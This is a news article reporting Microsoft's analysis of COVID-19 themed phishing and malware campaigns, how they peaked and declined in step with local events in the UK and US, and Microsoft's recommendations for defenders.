Microsoft’s COVID-19 Threat Analysis Reveals Attackers Adapt Campaigns to Local Events

Many threat actors have adopted COVID-19 themed lures in phishing campaigns and for distributing malware, but the proportion of COVID-19 related threats is much lower than the headlines suggest, according to a recent report from Microsoft. In fact, Microsoft’s figures suggest only about 2% of all threats were related to COVID-19 and coronavirus over the past 4 months.

Microsoft has previously reported that while there have been many reports of an increase in COVID-19 threats, which was undoubtedly the case, the total volume of threats barely changed. All that happened was some threat actors repurposed their infrastructure and started sending COVID-19 themed lures. There has been a slight increase in attacks, but it is mostly just a tiny blip and malware campaigns have remained fairly constant throughout the COVID-19 crisis.

Microsoft confirmed that the number of COVID-19 threats has increased since February and says there is no indication that those threats will reduce to the level seen in February or earlier, until the threat from the virus significantly reduces but the peak has long since passed. COVID-19 themed threats peaked in the first two weeks of March and have steadily declined since, as threat actors have returned to their previous campaigns using standard phishing and identity compromise attacks.

Microsoft explains that the lures used in malware and phishing campaigns are localized and follow developments in the countries being targeted. Microsoft analyzed trends in three countries and notes that in the United Kingdom, COVID-19 themed campaigns peaked early in the outbreak, around the time that the first COVID-19 death was reported. COVID-19 themed attacks then declined until the Prime Minister was admitted into hospital, when attacks started to rise again. They started to fall when the PM was discharged from hospital.

In the United States there have been three peaks but the pattern is similar to that of the UK. The first peak occurred when at the point when the first death was announced, there was a decline until COVID-19 was declared a pandemic by WHO, followed by a rise up until the travel ban was announced. Then came a sharp decline and plateau until around March 17, when there was a sharp spike up until 100,000 deaths had been reported, followed by a similarly sharp decline.

Cybercriminals have taken advantage of the opportunities created by COVID-19, but what is actually happening is cybercriminals are simply responding to local news. Cybercriminals are simply adapting their campaigns to maximize the chance of success. Lures will change rapidly depending on local events.

“Defender investment is best placed in cross-domain signal analysis, update deployment, and user education,” explained Microsoft. “These COVID-19 themed attacks show us that the threats our users face are constant on a global scale. Investments that raise the cost of attack or lower the likelihood of success are the optimal path forward.”

Microsoft recommend network defenders should focus on the behaviors of attackers, as this will be more effective than just examining indicators of compromise. The latter tend to be just a snapshot of a point in time and are not as durable.

Author: Richard Anderson

Richard Anderson is the Editor-in-Chief of